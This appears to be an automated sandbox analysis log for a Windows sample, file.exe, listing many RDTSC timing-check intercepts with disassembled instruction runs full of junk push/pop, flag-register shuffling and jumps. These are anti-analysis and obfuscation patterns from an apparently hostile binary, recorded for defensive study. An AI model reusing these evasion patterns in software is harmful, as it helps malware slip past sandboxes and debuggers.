Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F5C0B second address: 7F5C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCF9D8C7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jg 00007FA1CCF9D8B6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F5C33 second address: 7F5C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FA1CCCD2146h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F5C42 second address: 7F5C48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FADB7 second address: 7FADD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA1CCCD2153h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FADD3 second address: 7FADD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8033BC second address: 8033C1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80749D second address: 8074A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA1CCF9D8B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8074A8 second address: 8074B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80E73A second address: 80E740 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 812E96 second address: 812EA0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA1CCCD2146h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 812EA0 second address: 812EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007FA1CCF9D8BAh 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jbe 00007FA1CCF9D8B6h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 813037 second address: 81303B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81303B second address: 81303F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81303F second address: 81305B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA1CCCD2153h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7248C8 second address: 7248CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7248CC second address: 7248D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7248D4 second address: 7248EC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA1CCF9D8BEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7248EC second address: 7248FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCCD214Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7248FF second address: 724905 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 724905 second address: 724911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007FA1CCCD2146h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 823080 second address: 82309A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA1CCF9D8C2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82309A second address: 8230A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 832300 second address: 83230A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA1CCF9D8B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 847F60 second address: 847F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA1CCCD214Ah 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007FA1CCCD214Ch 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 jmp 00007FA1CCCD2156h 0x0000001a popad 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 847F9D second address: 847FB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCF9D8C1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8480DC second address: 8480E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8480E5 second address: 8480EF instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA1CCF9D8BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8480EF second address: 848119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jne 00007FA1CCCD2146h 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007FA1CCCD214Ah 0x00000012 js 00007FA1CCCD2146h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jng 00007FA1CCCD2148h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84826E second address: 848274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 848274 second address: 848282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jl 00007FA1CCCD2146h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 848282 second address: 848286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 848286 second address: 8482C2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA1CCCD2146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FA1CCCD2156h 0x00000010 jmp 00007FA1CCCD2159h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8485D4 second address: 8485DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8485DA second address: 8485DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8485DE second address: 8485E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8485E4 second address: 8485EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8485EE second address: 8485F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8485F2 second address: 8485FC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA1CCCD2146h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 848882 second address: 8488A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 jo 00007FA1CCF9D8B6h 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA1CCF9D8C5h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 848B61 second address: 848B67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 848B67 second address: 848B8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C6h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007FA1CCF9D8BCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 848B8F second address: 848B93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84EBC7 second address: 84EBCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8507AA second address: 8507AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0330 second address: 52F0341 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0341 second address: 52F038F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD2151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FA1CCCD2159h 0x00000014 sub si, 7556h 0x00000019 jmp 00007FA1CCCD2151h 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F038F second address: 52F0393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0393 second address: 52F03CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FA1CCCD214Bh 0x00000012 adc ax, 868Eh 0x00000017 jmp 00007FA1CCCD2159h 0x0000001c popfd 0x0000001d mov edi, ecx 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F03CD second address: 52F03E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1CCF9D8C8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F03E9 second address: 52F0425 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b jmp 00007FA1CCCD2157h 0x00000010 mov ecx, dword ptr [ebp+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FA1CCCD2155h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F043D second address: 52F0443 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0443 second address: 52F045D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1CCCD2156h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 531060C second address: 5310676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push ecx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FA1CCF9D8C8h 0x00000013 or ch, FFFFFFA8h 0x00000016 jmp 00007FA1CCF9D8BBh 0x0000001b popfd 0x0000001c pushad 0x0000001d mov cx, 8CB5h 0x00000021 mov ax, 3F31h 0x00000025 popad 0x00000026 popad 0x00000027 push eax 0x00000028 jmp 00007FA1CCF9D8C7h 0x0000002d xchg eax, ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 jmp 00007FA1CCF9D8BBh 0x00000036 push esi 0x00000037 pop edx 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310778 second address: 53107D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 3E52h 0x00000007 pushfd 0x00000008 jmp 00007FA1CCCD2153h 0x0000000d sbb cl, 0000004Eh 0x00000010 jmp 00007FA1CCCD2159h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 lea eax, dword ptr [ebp-04h] 0x0000001c jmp 00007FA1CCCD214Eh 0x00000021 nop 0x00000022 pushad 0x00000023 mov cx, D49Dh 0x00000027 mov ah, 1Dh 0x00000029 popad 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov eax, ebx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53107D5 second address: 53107DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310835 second address: 531083B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 531083B second address: 531083F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 531083F second address: 5310853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-04h], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push ecx 0x00000012 pop edx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310853 second address: 5310879 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA1CCF9D8BDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310908 second address: 531001B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA1CCCD2157h 0x00000009 or esi, 70836D6Eh 0x0000000f jmp 00007FA1CCCD2159h 0x00000014 popfd 0x00000015 jmp 00007FA1CCCD2150h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d pop esi 0x0000001e pushad 0x0000001f mov edx, ecx 0x00000021 pushad 0x00000022 mov ecx, 09A840DFh 0x00000027 push eax 0x00000028 pop edx 0x00000029 popad 0x0000002a popad 0x0000002b leave 0x0000002c pushad 0x0000002d push eax 0x0000002e mov eax, edi 0x00000030 pop ebx 0x00000031 pushfd 0x00000032 jmp 00007FA1CCCD2154h 0x00000037 and ecx, 71EF2E78h 0x0000003d jmp 00007FA1CCCD214Bh 0x00000042 popfd 0x00000043 popad 0x00000044 retn 0004h 0x00000047 nop 0x00000048 sub esp, 04h 0x0000004b xor ebx, ebx 0x0000004d cmp eax, 00000000h 0x00000050 je 00007FA1CCCD2295h 0x00000056 xor eax, eax 0x00000058 mov dword ptr [esp], 00000000h 0x0000005f mov dword ptr [esp+04h], 00000000h 0x00000067 call 00007FA1D1A4DC9Bh 0x0000006c mov edi, edi 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007FA1CCCD2157h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 531001B second address: 531003D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 7D7C749Ah 0x00000008 movsx ebx, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FA1CCF9D8BAh 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov dl, cl 0x0000001a mov esi, ebx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 531003D second address: 5310043 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310043 second address: 5310047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310047 second address: 531004B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 531004B second address: 5310073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FA1CCF9D8C8h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310073 second address: 5310078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310078 second address: 5310119 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA1CCF9D8C5h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007FA1CCF9D8C1h 0x0000000f adc cl, 00000036h 0x00000012 jmp 00007FA1CCF9D8C1h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push FFFFFFFEh 0x0000001d pushad 0x0000001e call 00007FA1CCF9D8BCh 0x00000023 movzx esi, di 0x00000026 pop edx 0x00000027 pushfd 0x00000028 jmp 00007FA1CCF9D8BCh 0x0000002d sub cl, FFFFFF88h 0x00000030 jmp 00007FA1CCF9D8BBh 0x00000035 popfd 0x00000036 popad 0x00000037 push 6B245CEFh 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f mov edi, ecx 0x00000041 pushfd 0x00000042 jmp 00007FA1CCF9D8BCh 0x00000047 jmp 00007FA1CCF9D8C5h 0x0000004c popfd 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310119 second address: 531015E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD2151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 0A8A4159h 0x00000010 pushad 0x00000011 mov bx, cx 0x00000014 movzx ecx, bx 0x00000017 popad 0x00000018 push 5BFF3C9Ah 0x0000001d jmp 00007FA1CCCD2150h 0x00000022 xor dword ptr [esp], 2E5617EAh 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 531015E second address: 5310162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310162 second address: 53101C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ah, FBh 0x00000008 popad 0x00000009 mov eax, dword ptr fs:[00000000h] 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FA1CCCD2151h 0x00000016 and cx, F4C6h 0x0000001b jmp 00007FA1CCCD2151h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007FA1CCCD2150h 0x00000027 add ah, 00000068h 0x0000002a jmp 00007FA1CCCD214Bh 0x0000002f popfd 0x00000030 popad 0x00000031 nop 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53101C2 second address: 53101F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FA1CCF9D8C1h 0x0000000a add cx, D786h 0x0000000f jmp 00007FA1CCF9D8C1h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53101F0 second address: 53101F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53101F6 second address: 53101FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53101FA second address: 53101FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53101FE second address: 531024A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FA1CCF9D8C6h 0x0000000e nop 0x0000000f pushad 0x00000010 mov si, 04EDh 0x00000014 mov eax, 3C4B02E9h 0x00000019 popad 0x0000001a sub esp, 18h 0x0000001d jmp 00007FA1CCF9D8C4h 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 movsx ebx, ax 0x00000029 mov al, 99h 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 531024A second address: 53102D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA1CCCD214Eh 0x00000009 add si, 5218h 0x0000000e jmp 00007FA1CCCD214Bh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FA1CCCD2158h 0x0000001a or si, BC78h 0x0000001f jmp 00007FA1CCCD214Bh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 push eax 0x00000029 jmp 00007FA1CCCD2159h 0x0000002e xchg eax, ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FA1CCCD2158h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53102D1 second address: 53102D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53102D5 second address: 53102DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53102DB second address: 53102F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 mov ecx, edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA1CCF9D8BAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53102F5 second address: 53102FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53102FB second address: 531030C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1CCF9D8BDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 531030C second address: 5310310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
